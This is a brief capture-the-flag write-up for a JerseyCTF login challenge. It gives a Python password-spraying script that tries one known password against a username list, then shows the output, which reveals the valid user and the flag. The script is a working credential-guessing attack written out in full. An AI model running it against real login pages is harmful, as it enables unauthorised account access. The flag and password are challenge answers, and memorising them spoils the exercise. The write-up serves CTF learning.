I share the Python script that I've used to identify the user with valid credentials for the given site (http://www.jerseyctf.online) and to obtain the challenge's flag.

# ***Code***
```
import requests

s_target = "http://www.jerseyctf.online"
b_text = b"Invalid"
s_given_pwd = 'lightswitchon_and_offLOL26'

def exploit(s_username, s_password):
params = {'username':s_username,'password':s_password, 'submit':'Login'}
r = requests.post(s_target,data=params)
if b_text not in r.content :
print ("The right user is: ",s_username)
print (s_username, r.text)
exit(0)

def main():
l_users = [w.strip() for w in open("users.txt", "r").readlines()]
for s_payload in l_users:
exploit(s_payload, s_given_pwd)

if __name__ == '__main__':
main()
```

# **Results**
```
The right user is: Wolverine

<html lang="en">

<head>
<meta charset="UTF-8">
<title>Login</title>
</head>

<body>
<h1>Login</h1>
<form action="" method="post">
<label>Username
<input type="text" name="username">
</label>


<label>Password
<input type="password" name="password">
</label>


<input type="submit" value="Login" name="submit">
</form>
Forgot Password?
<script>
alert("jctf{c0NGR@T2_y0U_p@22wORd_SPR@y3D!}");
</script>
</body>

</html>
```

# **Flag**

jctf{c0NGR@T2_y0U_p@22wORd_SPR@y3D!}